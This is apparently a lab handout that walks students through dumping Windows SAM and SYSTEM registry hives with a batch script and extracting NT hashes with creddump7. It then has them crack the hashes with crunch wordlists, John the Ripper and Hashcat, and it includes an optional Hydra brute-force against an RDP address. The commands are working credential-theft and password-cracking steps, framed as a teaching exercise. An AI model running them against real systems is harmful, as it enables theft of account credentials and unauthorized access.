Cracking Passwords

This document provides a step-by-step guide for extracting and cracking Windows passwords using various tools and commands. It details the process of creating a user, exporting registry hives, installing creddump7 on Kali Linux, extracting password hashes, generating a wordlist with crunch, and using John the Ripper for brute force attacks. Additionally, it includes optional steps for using Hydra and Hashcat for further password cracking methods.

Uploaded by

amr hassan

Dr. Mohammed Tawfik
Kmkhol01@gmail.com
https://orcid.org/0000-0002-1227-387X

Task: Extracting and Cracking Passwords from Windows

Step 1: Creating a User with a Password on Windows

1. Open Command Prompt as Administrator:
   • Press Win + X and select Command Prompt (Admin).
   • If prompted by User Account Control, click Yes.

2. Create a New User with Password:

Command: net user test 7444 /add

This creates a local account named test with the password 7444; its hash is what the later steps extract and crack.

Step 2: Exporting SAM and SYSTEM Registry Hives

1. Save the Following Script with a .bat Extension and Run It as Administrator (or run the same commands in an elevated Command Prompt)

@echo off
echo Exporting SAM and SYSTEM registry hives...
setlocal
set "scriptPath=%~dp0"

:: Ensure the script is running with administrative privileges
:: (reg.exe save on HKLM\SAM and HKLM\SYSTEM fails without them)
net session >nul 2>&1
if %errorLevel% neq 0 (
    echo Requesting administrative privileges...
    powershell -Command "Start-Process '%~0' -Verb RunAs"
    exit /b
)

echo Saving SAM hive...
reg.exe save HKLM\SAM "%scriptPath%sam_f" || (
    echo Failed to save SAM hive.
    goto end
)

echo Saving SYSTEM hive...
reg.exe save HKLM\SYSTEM "%scriptPath%system_f" || (
    echo Failed to save SYSTEM hive.
    goto end
)

endlocal
echo Export completed.
pause

:end

This script exports the SAM and SYSTEM registry hives to files named sam_f and system_f in the
same directory as the script.

Check that these two files (sam_f and system_f) have been created successfully before moving on.

Note: the Security Account Manager (SAM) hive is stored in the file C:\Windows\System32\config\SAM
and contains the hashed passwords. Windows keeps this file locked while it is running, which is why
the script uses reg.exe save instead of copying it. The SYSTEM hive is exported as well because it
holds the boot key that encrypts the hashes inside SAM; without it the hashes cannot be decoded.

Step 3: Installing creddump7 on Kali Linux

Open Terminal on Kali Linux:

• Press Ctrl + Alt + T or find Terminal in your applications menu.

Run the Following Command:

sudo apt-get install creddump7

This command installs the creddump7 tool, which is used for extracting credentials from
Windows registry hives.

Expected Result:

• The creddump7 tool should be installed without errors. Students can verify this by
running creddump7 --help to see if the tool's help information is displayed.

Step 4: Using creddump7 to Extract Password Hashes

Navigate to the Directory Containing the Exported Hives:

cd /root/Desktop/sam/

To avoid path mistakes, either copy the files from /usr/share/creddump7/ into the sam folder on the
Desktop, or run the script from its own folder and give the full paths of the hives:
python pwdump.py /root/Desktop/sam/system_f /root/Desktop/sam/sam_f

Run the Following Command:

python pwdump.py system_f sam_f

This command uses creddump7 to extract the password hashes from the system_f and sam_f files
(the SYSTEM hive supplies the boot key needed to decrypt the hashes stored in the SAM hive).

Optional: Save the Results to a File:

python pwdump.py system_f sam_f > results.txt

Expected Result:

• The extracted password hashes will be displayed in the terminal or saved to results.txt.
Students should see one line per account in the form username:RID:LM hash:NT hash:::.

Keep only the line of the user whose password you want to crack, or keep all of them.

Step 5: Creating a Wordlist with crunch

Open Terminal on Kali Linux:

• Press Ctrl + Alt + T or find Terminal in your applications menu.

Run the Following Command:

crunch 4 4 0123456789 -o ~/Desktop/word.txt

This command creates a wordlist with all possible 4-digit combinations (0000 to 9999) and saves
it to ~/Desktop/word.txt. (crunch's -b option, which splits the output into files of a given size,
only works together with -o START, so it is not used here.)

Note: A wordlist is essentially a file that contains a list of potential passwords. It is used by
password-cracking tools to attempt to log into an account by trying every password in the list.

Step 6: Using John the Ripper for Brute Force Attack

• Open Terminal on Kali Linux: press Ctrl + Alt + T or find Terminal in your applications menu.

• Navigate to the Directory Containing the Password Hashes:

cd /root/Desktop/sam/

• Run the Following Command:

john --format=NT --wordlist=~/Desktop/word.txt results.txt

This command uses John the Ripper to test every entry of the generated wordlist against the NT
hashes in results.txt. Because the wordlist covers all 10,000 four-digit candidates, the attack
finishes almost instantly; a password this short offers no real protection.

Additional Examples:

1. Using a Different Wordlist:

john --format=NT --wordlist=~/Desktop/another_wordlist.txt results.txt

2. Setting a Maximum Runtime (in seconds):

john --format=NT --wordlist=~/Desktop/4digit_wordlist_extended.txt --max-run-time=3600 results.txt

3. Using Custom Rules (word-mangling rules applied to each wordlist entry):

john --format=NT --wordlist=~/Desktop/4digit_wordlist_extended.txt --rules results.txt

In each case the hash file is the pwdump output (results.txt), not the raw sam_f hive, which John
cannot read directly.

Optional Steps:

• Using Hydra for RDP Attack (Optional):

hydra -l hackme -P ~/Desktop/word.txt -t 4 -V rdp://192.168.1.137

• Using Hashcat for Brute Force Attack (Optional):

hashcat -m 1000 -a 0 --username results.txt ~/Desktop/word.txt

To show all results:

hashcat -m 1000 --username --show results.txt

(-m 1000 selects the NTLM hash type and -a 0 a straight wordlist attack; --username tells hashcat
to skip the username:RID:LM prefix that pwdump places in front of each NT hash.)

The cracked passwords are now listed next to their hashes.